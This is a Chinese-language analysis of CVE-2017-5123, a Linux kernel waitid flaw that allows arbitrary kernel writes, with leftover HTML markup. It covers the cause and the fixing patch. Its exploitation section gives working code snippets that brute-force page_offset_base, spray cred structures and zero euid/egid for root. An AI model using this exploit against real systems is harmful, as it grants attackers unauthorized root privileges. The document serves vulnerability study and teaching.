CVE-2017-5123 waitid 漏洞分析与利用指南<\/h1>

漏洞概述<\/h2>
CVE-2017-5123 是 Linux 内核中的一个权限提升漏洞，影响 Linux 内核版本 v4.13 到 v4.14-rc5。该漏洞源于 `waitid<\/code> 系统调用在向用户空间写入数据时未对目标地址进行合法性检查，导致攻击者可以向内核空间任意地址写入数据。<\/p>`

漏洞背景<\/h2>
waitid 系统调用<\/h3>
waitid<\/code> 是 Linux 中的一个系统调用，用于获取子进程状态变化信息。其原型如下：<\/p>
int<\/span> waitid<\/span>(idtype_t idtype, id_t id, siginfo_t *<\/span>infop, int<\/span> options);
<\/span><\/span><\/code><\/pre>参数说明：<\/p>

idtype<\/code>：指定等待的子进程类型（P_PID、P_PGID、P_ALL）<\/li>
id<\/code>：等待的子进程 PID<\/li>
infop<\/code>：存储子进程相关信息的 siginfo_t<\/code> 结构体指针<\/li>
options<\/code>：指定获取的子进程状态类型<\/li>
<\/ul>
siginfo_t<\/code> 结构体定义如下：<\/p>
typedef<\/span> struct<\/span> {
<\/span><\/span>    int<\/span> si_signo;
<\/span><\/span>    int<\/span> si_code;
<\/span><\/span>    union<\/span> sigval si_value;
<\/span><\/span>    int<\/span> si_errno;
<\/span><\/span>    pid_t si_pid;
<\/span><\/span>    uid_t si_uid;
<\/span><\/span>    void<\/span> *<\/span>si_addr;
<\/span><\/span>    int<\/span> si_status;
<\/span><\/span>    int<\/span> si_band;
<\/span><\/span>} siginfo_t;
<\/span><\/span><\/code><\/pre>漏洞成因<\/h2>
用户空间与内核空间数据传递<\/h3>
正常情况下，内核与用户空间数据传递应使用：<\/p>

put_user()<\/code>\/get_user()<\/code><\/li>
copy_from_user()<\/code>\/copy_to_user()<\/code><\/li>
<\/ul>
这些函数会：<\/p>

检查地址合法性<\/li>
处理 SMEP\/SMAP 保护<\/li>
<\/ol>
从内核 4.13 版本开始，waitid<\/code> 使用 unsafe_put_user()<\/code> 宏来优化性能，避免多次检查\/开关保护的开销。<\/p>
关键问题<\/h3>
waitid<\/code> 实现中：<\/p>

使用了 user_access_begin()<\/code> 和 user_access_end()<\/code> 来开关 SMAP 保护<\/li>
但缺少了 access_ok()<\/code> 检查<\/strong><\/li>
导致可以传入内核空间地址并写入数据<\/li>
<\/ol>
漏洞代码片段：<\/p>
SYSCALL_DEFINE5(waitid, ...) {
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    if<\/span> (!<\/span>infop)
<\/span><\/span>        return<\/span> err;
<\/span><\/span>        
<\/span><\/span>    user_access_begin();
<\/span><\/span>    unsafe_put_user(signo, &<\/span>infop-><\/span>si_signo, Efault);  \/\/ 可写入内核地址
<\/span><\/span><\/span><\/span>    unsafe_put_user(0<\/span>, &<\/span>infop-><\/span>si_errno, Efault);
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    user_access_end();
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞利用<\/h2>
利用思路<\/h3>

通过 unsafe_put_user(0, &infop->si_errno, Efault)<\/code> 可以向任意地址写入 0<\/li>
目标是修改当前进程的 cred<\/code> 结构体中的 euid<\/code> 为 0<\/li>
需要解决的关键问题：获取 cred<\/code> 结构体地址<\/li>
<\/ol>
利用步骤<\/h3>
1. 获取内核线性映射区基址<\/h4>
64位 Linux 的虚拟内存布局中包含"物理地址直接映射区"（direct mapping area），其特点是：<\/p>

线性地址到物理地址的映射是连续的<\/li>
kmalloc<\/code> 分配的内存位于此区域<\/li>
起始地址称为 page_offset_base<\/code>（未开启 KASLR 时为 0xffff888000000000）<\/li>
<\/ul>
爆破方法：<\/p>
size_t page_offset_base =<\/span> 0xffff888000000000<\/span>;
<\/span><\/span>while<\/span> (1<\/span>) {
<\/span><\/span>    int<\/span> pid =<\/span> fork();
<\/span><\/span>    if<\/span> (pid ==<\/span> 0<\/span>) exit(-<\/span>1<\/span>);
<\/span><\/span>    retval =<\/span> waitid(P_PID, pid, page_offset_base, WEXITED);
<\/span><\/span>    if<\/span> (retval >=<\/span> 0<\/span>) break<\/span>;  \/\/ 找到有效地址
<\/span><\/span><\/span><\/span>    page_offset_base +=<\/span> 0x10000000<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2. 定位 cred 结构体<\/h4>
通过实验发现：<\/p>

cred<\/code> 结构体通常位于 page_offset_base + 0x10000000<\/code> 之后<\/li>
从 page_offset_base + 0x50000000<\/code> 开始出现概率较高<\/li>
<\/ul>
3. 完整利用流程<\/h4>

喷射大量 cred<\/code> 结构体（使用 clone<\/code> 创建子进程）<\/li>
从预测位置开始遍历写 0<\/li>
检查是否成功修改了某个 cred<\/code> 的 euid<\/code><\/li>
<\/ol>
示例代码片段：<\/p>
\/\/ 喷射 cred
<\/span><\/span><\/span><\/span>for<\/span> (int<\/span> i =<\/span> 0<\/span>; i <<\/span> 2000<\/span>; i++<\/span>) {
<\/span><\/span>    void<\/span> *<\/span>child_stack =<\/span> malloc(0x1000<\/span>);
<\/span><\/span>    clone(child_process, child_stack, CLONE_VM|<\/span>CLONE_FS|<\/span>CLONE_FILES, NULL);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 攻击：遍历写0
<\/span><\/span><\/span><\/span>for<\/span> (size_t i =<\/span> 0<\/span>, cur_attack_addr =<\/span> page_offset_base +<\/span> 0x6f500000<\/span>; ; i++<\/span>) {
<\/span><\/span>    if<\/span> (i ><\/span> 23<\/span>) { i =<\/span> 0<\/span>; cur_attack_addr +=<\/span> 0x1000<\/span>; }
<\/span><\/span>    waitid(P_ALL, 0<\/span>, cur_attack_addr +<\/span> 4<\/span> +<\/span> i*<\/span>176<\/span>, WNOHANG);  \/\/ 写 euid
<\/span><\/span><\/span><\/span>    waitid(P_ALL, 0<\/span>, cur_attack_addr +<\/span> 20<\/span> +<\/span> i*<\/span>176<\/span>, WNOHANG); \/\/ 写 egid
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞修复<\/h2>
修复方法是在 waitid<\/code> 中添加 access_ok()<\/code> 检查：<\/p>
diff --git a\/kernel\/exit.c b\/kernel\/exit.c
<\/span><\/span>index f2cd53e..cf28528 100644
<\/span><\/span>--- a\/kernel\/exit.c
<\/span><\/span><\/span><\/span>+++ b\/kernel\/exit.c
<\/span><\/span><\/span><\/span>@@ -1610,6 +1610,9 @@ SYSCALL_DEFINE5(waitid, int, which, pid_t, upid, struct siginfo __user *, infop,
<\/span><\/span><\/span><\/span>     if (!infop)
<\/span><\/span>         return err;
<\/span><\/span> 
<\/span><\/span>+    if (!access_ok(VERIFY_WRITE, infop, sizeof(*infop)))
<\/span><\/span><\/span>+        goto Efault;
<\/span><\/span><\/span>+
<\/span><\/span><\/span><\/span>     user_access_begin();
<\/span><\/span>     unsafe_put_user(signo, &infop->si_signo, Efault);
<\/span><\/span>     unsafe_put_user(0, &infop->si_errno, Efault);
<\/span><\/span><\/code><\/pre>总结<\/h2>
CVE-2017-5123 是一个典型的内核空间任意地址写入漏洞，其特点包括：<\/p>

利用条件苛刻，需要精确预测 cred<\/code> 结构体位置<\/li>
成功率不高，容易导致内核崩溃<\/li>
影响范围有限（仅特定内核版本）<\/li>
修复简单，只需添加地址检查<\/li>
<\/ol>
该漏洞展示了内核开发中安全机制完整性的重要性，即使是性能优化也不能牺牲基本的安全检查。<\/p>